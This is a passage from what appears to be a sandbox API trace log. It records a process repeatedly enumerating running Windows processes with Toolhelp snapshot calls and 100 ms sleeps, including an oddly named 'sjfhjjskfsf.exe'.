szExeFile="svchost.exe")) returned 1 [0217.679] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.680] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.680] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.680] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.681] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.681] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.681] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.681] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.682] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.682] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.682] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.683] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.683] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.683] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.684] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.684] Process32NextW (in: hSnapshot=0x1b0, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.684] Sleep (dwMilliseconds=0x64) [0217.790] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b4 [0217.792] Process32FirstW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.792] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.793] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.793] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.793] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.794] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.794] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.794] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.795] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.795] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.795] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.796] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.796] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.796] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.797] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.797] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.797] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.798] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.798] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.798] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.799] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.799] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.799] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.799] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.800] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.800] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.800] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.801] Process32NextW (in: hSnapshot=0x1b4, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.801] Sleep (dwMilliseconds=0x64) [0217.902] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1b8 [0217.904] Process32FirstW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0217.904] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0217.904] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0217.905] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.905] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0217.905] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0217.906] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0217.906] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0217.906] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0217.907] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1dc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xb, th32ParentProcessID=0x174, pcPriClassBase=8, dwFlags=0x0, szExeFile="lsm.exe")) returned 1 [0217.907] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x24c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x12, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.907] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x290, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0xe, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.908] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x2c4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.908] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x33c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.908] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x364, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2f, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.909] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3a0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x2c4, pcPriClassBase=8, dwFlags=0x0, szExeFile="audiodg.exe")) returned 1 [0217.909] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x3fc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x14, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.909] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x184, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x11, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.910] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x43c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x1a8, pcPriClassBase=8, dwFlags=0x0, szExeFile="userinit.exe")) returned 1 [0217.910] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x448, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x5, th32ParentProcessID=0x33c, pcPriClassBase=8, dwFlags=0x0, szExeFile="dwm.exe")) returned 1 [0217.910] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x458, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x20, th32ParentProcessID=0x43c, pcPriClassBase=8, dwFlags=0x0, szExeFile="explorer.exe")) returned 1 [0217.911] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x47c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="spoolsv.exe")) returned 1 [0217.911] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4bc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="taskhost.exe")) returned 1 [0217.911] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x18, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="svchost.exe")) returned 1 [0217.912] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x53c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x2, th32ParentProcessID=0x458, pcPriClassBase=8, dwFlags=0x0, szExeFile="ONENOTEM.EXE")) returned 1 [0217.912] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x568, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x3, th32ParentProcessID=0x524, pcPriClassBase=8, dwFlags=0x0, szExeFile="reader_sl.exe")) returned 1 [0217.912] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x68c, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x16, th32ParentProcessID=0x1cc, pcPriClassBase=8, dwFlags=0x0, szExeFile="OfficeClickToRun.exe")) returned 1 [0217.913] Process32NextW (in: hSnapshot=0x1b8, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x7ec, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x74c, pcPriClassBase=8, dwFlags=0x0, szExeFile="sjfhjjskfsf.exe")) returned 1 [0217.913] Sleep (dwMilliseconds=0x64) [0218.015] CreateToolhelp32Snapshot (dwFlags=0x2, th32ProcessID=0x0) returned 0x1bc [0218.016] Process32FirstW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x0, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x1, th32ParentProcessID=0x0, pcPriClassBase=0, dwFlags=0x0, szExeFile="[System Process]")) returned 1 [0218.017] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x50, th32ParentProcessID=0x0, pcPriClassBase=8, dwFlags=0x0, szExeFile="System")) returned 1 [0218.017] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x104, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x4, th32ParentProcessID=0x4, pcPriClassBase=11, dwFlags=0x0, szExeFile="smss.exe")) returned 1 [0218.017] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x144, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x8, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.018] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x174, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x13c, pcPriClassBase=13, dwFlags=0x0, szExeFile="wininit.exe")) returned 1 [0218.018] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x180, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x7, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="csrss.exe")) returned 1 [0218.018] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1a8, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x6, th32ParentProcessID=0x16c, pcPriClassBase=13, dwFlags=0x0, szExeFile="winlogon.exe")) returned 1 [0218.019] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1cc, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x13, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="services.exe")) returned 1 [0218.019] Process32NextW (in: hSnapshot=0x1bc, lppe=0x18ebc4 | out: lppe=0x18ebc4*(dwSize=0x22c, cntUsage=0x0, th32ProcessID=0x1d4, th32DefaultHeapID=0x0, th32ModuleID=0x0, cntThreads=0x9, th32ParentProcessID=0x174, pcPriClassBase=9, dwFlags=0x0, szExeFile="lsass.exe")) returned 1 [0218.019] Process32NextW (in: hSnapshot=0x1bc, 